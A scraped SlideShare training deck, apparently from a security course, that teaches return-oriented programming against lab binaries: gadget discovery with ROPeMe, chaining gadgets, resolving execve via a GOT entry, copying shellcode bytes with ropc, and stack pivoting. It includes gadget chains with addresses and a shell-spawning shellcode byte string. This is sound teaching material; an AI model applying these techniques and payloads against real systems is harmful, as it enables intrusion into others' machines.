Successfully reported this slideshow.
Your SlideShare is downloading. ×

08 - Return Oriented Programming, the chosen one

More Related Content

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all

08 - Return Oriented Programming, the chosen one

  1. 1. Return Oriented Programming The chosen one Alex Moneger Security Engineer
  2. 2. Introduction  ROP = Return Oriented Programming  Uses the “ret” instruction to drive the execution flow  Allows to bypass ASLR and DEP  Relies on the fact that .text section is at a fixed address  Used in all modern exploits © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
  3. 3. Refresher  Ret2libc uses function addresses at known locations  Never executes code on the stack  Problem: ASLR randomizes the addresses  Any other fixed address candidates? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
  4. 4. General concepts © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
  5. 5. Non-randomized addresses  Check the randomization again: cisco@kali:~/src/seccon/ch8$ ./aslr Stack base address: 0xbfcb9a74 Heap base address: 0x8cbd008 Memcpy libc address: 0xb76ad9a0 Code section address: 0x804857e Data section address: 0x80498d0 RO data section address: 0x8048670 cisco@kali:~/src/seccon/ch8$ ./aslr Stack base address: 0xbfd14d04 Heap base address: 0x85d7008 Memcpy libc address: 0xb76ce9a0 Code section address: 0x804857e Data section address: 0x80498d0 RO data section address: 0x8048670  With ASLR enabled, .text is not randomized © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
  6. 6. Impact  .text section is not randomized  .data section is not randomized  PLT is a fixed offset from .text  GOT is at fixed address, because in the same segment as .text  Can we re-use any of this? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
  7. 7. .text  What can we do in .text?  .text is the code section, so contains instructions  How can we re-use those instructions?  Remember pop;pop;ret construct from ret2libc?  We can re-use any instructions with a trailing “ret”  This let’s us keep control of the execution stack © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
  8. 8. BoF is control of eip, ROP is control of esp © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
  9. 9. Visual flow  I want to add 2 values together  Then put that value at a memory address  i.e: 4 (eax) + 3 (ebx) = 7 (eax)  0x1234 (mem) = 7 (eax) &mov mem reg ; ret 0x1234 &pop;ret &add reg reg; ret 3 4 &pop;pop;ret mov; ret pop reg ret add; ret pop reg pop reg © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
  10. 10. Steps 1. Know what you want to achieve (hardest) 2. Have a vague low-level idea of how to do it 3. Find gadgets 4. Find a way to stitch them together 5. Debug 6. Exploit © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
  11. 11. Finding instructions  Find all “ret”s in a program “xc3”  Disassemble backwards (pick a reasonable amount of instructions)  Set of instructions  Referred to as “gadgets”  That gives you a set you can play with © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
  12. 12. Finding instructions 1. Use objdump  Suboptimal, requires ret instruction to be semantically correct 2. Search for “xc3” opcode manually and disassemble back from there  Lot of manual work 3. Use a proper tool  We’ll use a tool, for once ;) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
  13. 13. Ropeme  Ropeme disassembles backwards a number of instructions  Allows you to search for gadgets using wildcards: cisco@kali:~/src/seccon/ch8$ ropshell.py Simple ROP interactive shell: [generate, load, search] gadgets ROPeMe> generate ch6 4 Generating gadgets for ch6 with backward depth=4 It may take few minutes depends on the depth and file size... Processing code block 1/1 Generated 93 gadgets Dumping asm gadgets to file: ch6.ggt ... OK ROPeMe> search add eax % Searching for ROP gadget: add eax % with constraints: [] 0x80482fcL: add eax 0x3ee8 ; add [eax+0x5b] bl ; leave ;; 0x80485f8L: add eax 0x83038745 ; add al 0x6e ;; ROPeMe> search pop % -leave Searching for ROP gadget: pop % with constraints: ['-leave'] 0x8048528L: pop ebp ;; 0x8048495L: pop ebx ; pop edi ; pop ebp ;; © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
  14. 14. Useful gadgets  Pop reg => put a value in reg  add [reg1] reg2 => add reg2 to memory address in reg1  mov [reg1] reg2 => mov reg2 into memory address in reg1  Call reg => call the address in reg  Jmp reg => jump to address © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
  15. 15. Put gadgets together  Create high level gadgets, by putting low level gadgets together: # Write value in eax to memory 0x8048502L: pop ebx ; pop ebp ;; 0x80484feL: add [ebx+0x5d5b04c4] eax ;; # Load memory value into eax 0x8048502L: pop ebx ; pop ebp ;; 0x804875eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;; # Load eax with a value 0x804dad5L: mov eax edi ; pop ebx ; pop esi ; pop edi ; pop ebp ;;  It’s up to you to find meaningful gadgets to use  Use those high level gadgets to build payloads © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15
  16. 16. ROP flow © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 16
  17. 17. Stages  ROP exploit generally has multiple stages 1. Stage 0:  Stabilize exploit  Take control of eip  Copy payload into fake frame  Dereference GOT 2. Stack pivot from stage 0 to stage 1 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 17
  18. 18. Stage 1 3. Stage 1:  Change memory permissions (optional)  Execute payload  Cleanup (optional) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 18
  19. 19. Getting function addresses © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 19
  20. 20. GOT dereferencing  Remember the GOT?  Grab an arbitrary address from it  Add the libc offset with the function you want  Call it  Or write it to mem, and call it later © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 20
  21. 21. Example  Example:  Find execve based on strcpy (0xb7ed8b70)  &Strcpy GOT = 0x08049fec  &Execve – &strcpy = 0x27b10 # Get the GOT address of strcpy (0x08049fec) into ebx 0x8052b9dL: pop ebx ; lea eax [edx+eax*8] ;; # Move the content of GOT entry (&strcpy) into edx 0x8052b98L: mov edx [ebx] ; pop ebx ; lea eax [edx+eax*8] ;; # Move delta between functions 0x27b10 into ecx 0x8060883L: pop ecx ;; # Add &strcpy with offset = &execve! 0x8061ddaL: add edx ecx;; 0x8061dda 0x27b10 0x8060883 0x41414141 0x8052b98 0x08049fec 0x8052b9d © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 21
  22. 22. Calling the function  Calling the dereferenced function (value in edx) # Call register 0x804c244L: call edx ; leave ;;  Writing the dereferenced function somewhere (ie: 0x12345678) # Move address value (0x12345678) into eax 0x8058ae0L: pop eax ; pop ebx ;; # Move adx to that address 0x8056579L: mov [eax] edx ;; © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 22
  23. 23. Copying payload © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 23
  24. 24. Stage 0  2 options:  Build shellcode from pieces of memory  Do multiple GOT dereferencing  Both end up the same:  Build fake stack frame to transfer control to © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 24
  25. 25. Copying shellcode  Find individual shellcode bytes in memory  Use a copy function (i.e: strcpy) to copy bytes from memory to fake stack frame  Ropc can give you the memory addresses of shellcode bytes cisco@kali:~/src/seccon/ch8$ ropc -s "x6ax0bx58x99x52x66x68x2dx70x89xe1x52x6ax68x68x2fx62x61x73x68x2fx62x69x6ex89xe3x52x51x53x89xe1xc dx80" -f ch8 0x00000000 -> "x6a" (NOT FOUND) 0x080485b4 -> "x0b" 0x080480f8 -> "x58" 0x08048378 -> "x99" 0x0804836a -> "x52" © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 25
  26. 26. Building payload  Identify fake stack  Find address of functions your interested in  Copy function addresses to fake stack  Copy arguments to fake stack  Stack pivot to new stack © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 26
  27. 27. Stack pivoting © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 27
  28. 28. Stack pivoting  Build a fake stack in memory with your payload  Move to it to start execution of payload  Called stack pivoting, because you lead the execution flow to your own stack © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 28
  29. 29. How to do it?  You need a way to control the stack pointer  Esp needs to be controlled, and redirected  Useful gadgets: Eax contains the value of your new frame 0x8055c61L: xchg esp eax ;; # leave = mov esp, ebp; pop ebp; Control ebp = control esp 0x8049844L: leave ;; © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 29
  30. 30. What it looks like  Stage 0 “copying” stack  Stage 1 “payload” stack 0x8061dda 0x27b10 0x8060883 0x41414141 0x8052b98 0x08049fec 0x8052b9d Esp = 0x12345678 Esp = 0x08048a00 0x12345678 – 0x4 Leave; ret Copy data Copy data Copy data Copy data Copy data © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 30
  31. 31. That’s it! © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 31
  32. 32. Exercise time!  Find what protections are active on ch8  No source, but I left symbols ;)  Reverse it  Find the vulnerability  Exploit it  You probably wont finish this today, but keep chewing on it ;) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 32

×